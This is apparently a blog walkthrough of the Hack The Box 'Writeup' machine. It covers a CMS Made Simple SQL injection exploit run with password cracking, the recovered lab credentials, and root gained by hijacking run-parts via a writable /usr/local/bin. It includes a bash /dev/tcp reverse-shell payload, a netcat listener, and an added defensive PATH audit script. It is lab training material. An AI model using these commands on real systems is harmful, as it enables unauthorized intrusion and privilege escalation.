Writeup

Venkatraman K
Hackthebox Writeups
5 min read, Oct 25, 2019

Writeup is a Linux-based machine.

Hints:

1. Vulnerable software can fetch what you need for you. The software information is given on the homepage.

2. For privilege escalation, think about groups, and about a file that may get executed even though it exists in two bin directories.

Detail Walkthrough:

I started with reconnaissance of the machine by scanning its ports and identifying the services running on it.

The scan pointed at robots.txt and /writeup/. I opened both in the browser: robots.txt did not contain much critical information, while /writeup/ hosted a website. I also viewed the homepage of the application running on this machine, which states that the application has some kind of DoS protection.

This means we cannot run any script or tool that generates many requests. I looked into the source of the page expecting some juicy information, and as expected a software name was disclosed.

It was running a CMS. To get more information, such as a banner or the service version, I used whatweb:

whatweb http://10.10.10.138/writeup/

But no version number was disclosed. I googled CMS Made Simple and found the version to be 2.2.10. There is an already known SQL injection exploit for it, CVE-2019-9053. I got the exploit code from Exploit DB and ran it with rockyou.txt as the wordlist:

python Intial_Exp.py -u http://10.10.10.138/writeup/ --crack -w /usr/share/wordlists/rockyou.txt

This fetched the salt and hash, the username, the email ID and the cracked password:

Username: jkr, Email ID: jkr@writeup.htb, Password: raykayjay9

Since SSH was running, I logged in to the machine with the obtained credentials.

I got a shell and BOOM! got user.txt. To continue the enumeration I used LinEnum, which I hosted from my own machine on port 8000 using:

python -m SimpleHTTPServer

Files could only be downloaded into the /tmp/ directory. I moved there, downloaded LinEnum and ran it, which gave tons of info. The only juicy parts were mysql and the staff group.

I thought I could enumerate the MySQL configuration file, which might contain some credentials, but it was of no use, so I googled the staff group on Debian:

staff: Allows users to add local modifications to the system (/usr/local) without needing root privileges (note that executables in /usr/local/bin are in the PATH variable of any user, and they may “override” the executables in /bin and /usr/bin with the same name). Compare with group “adm”, which is more related to monitoring/security.

It simply means that staff members can create or modify files in /usr/local/bin without root, and when /usr/local/bin and /bin both contain a file with the same name, the one found first in PATH is the one that runs. Echoing the PATH variable shows that /usr/local/bin comes before /bin, so its copy is executed first (in the scenario where both bin directories contain a file with the same name).

This can be exploited only if there is a file that gets executed automatically and is invoked without an absolute path (that is, called by its name alone rather than by its full path). A good tool for monitoring the processes and files running on a Linux machine is pspy. I downloaded it and moved it to the machine (using the same process I used for LinEnum).

I ran pspy and at first found nothing interesting. I then logged in to the machine as jkr in a new tab while monitoring the processes in the other tab. I found that run-parts was executed by root as soon as the user jkr logged in, that it was invoked by a relative path, and that the binary lives in /bin.

Thus we can create a file named run-parts in /usr/local/bin containing our payload, so that as soon as we log in as jkr the file run-parts gets executed and we get a shell with root privileges.
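The same condition can be checked from the defender's side: a PATH directory writable by non-root users that sits ahead of /bin and already holds (or could hold) a file whose name also exists later in PATH. The script below is an added example, not code from the original writeup; it assumes only POSIX sh, ls and cut, and audits whatever PATH string it is given.

```shell
#!/bin/sh
# Added PATH-hijack audit (example code, not from the original writeup).
# Flags PATH directories writable by group or others, then lists any name in
# such a directory that also exists as an executable in a LATER PATH entry.

# Return 0 if directory $1 is writable by its group or by others, else 1.
# The mode string comes from `ls -ld`, which works with GNU and BSD tools.
is_writable_dir() {
  [ -d "$1" ] || return 1
  mode=$(ls -ld "$1" | cut -c1-10)          # e.g. drwxrwsr-x
  case "$mode" in
    ?????w*|????????w*) return 0 ;;         # group-write or other-write set
    *) return 1 ;;
  esac
}

# Print each directory of the colon-separated PATH string $1 that
# is_writable_dir accepts, one per line.
writable_path_dirs() {
  oldifs=$IFS; IFS=:
  set -- $1; IFS=$oldifs
  for dir in "$@"; do
    is_writable_dir "$dir" && echo "$dir"
  done
  return 0
}

# For each writable directory in PATH string $1, print every entry whose
# name also exists as an executable in a directory later in the PATH.
shadowed_names() {
  oldifs=$IFS; IFS=:
  set -- $1; IFS=$oldifs
  while [ $# -gt 0 ]; do
    dir=$1; shift                            # "$@" is now the later entries
    is_writable_dir "$dir" || continue
    for f in "$dir"/*; do
      [ -e "$f" ] || continue
      name=${f##*/}
      for later in "$@"; do
        [ -x "$later/$name" ] && echo "$name: $dir shadows $later/$name"
      done
    done
  done
  return 0
}

# Audit the current PATH when run directly; a clean system prints nothing.
writable_path_dirs "$PATH"
shadowed_names "$PATH"
```

On the box above, a group-writable /usr/local/bin ahead of /bin is what the first function reports, and a planted run-parts is what the second one reports.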

I moved to the /usr/local/bin folder and created the file run-parts:

#!/bin/bash
touch /tmp/script-ran.txt
bash -i >& /dev/tcp/{YOUR_IP}/{PORT} 0>&1

Alternatively, you can generate an SSH key pair and have a small script named run-parts place the public key in ~/.ssh/authorized_keys, then connect to the machine with the key pair you created.

This gives a reverse shell back to my machine, and if the script ran successfully the touch command creates script-ran.txt in the tmp folder, so I monitored that folder with:

watch -n 1 ls -la

This command displays the files in the folder with their permissions and refreshes every second.

I started a reverse handler with netcat:

nc -lvnp {PORT}

I opened another tab and logged in as the jkr user.

BOOM! I got a shell with root access.

The root.txt flag is in the /root folder.

Happy Hacking!


@r3dw0lfsec | Security Researcher @ Vault Infosec | CEH | Bug Hunter